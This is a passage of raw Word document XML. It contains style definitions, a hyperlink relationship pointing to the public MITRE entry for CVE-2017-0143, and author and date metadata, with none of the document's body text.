    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="006C7C58"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C7C58"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C7C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2.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hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143" TargetMode="Externa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8</Pages>
  <Words>718</Words>
  <Characters>4094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Summerlin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>John Summerlin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-12T23:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-12T23:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>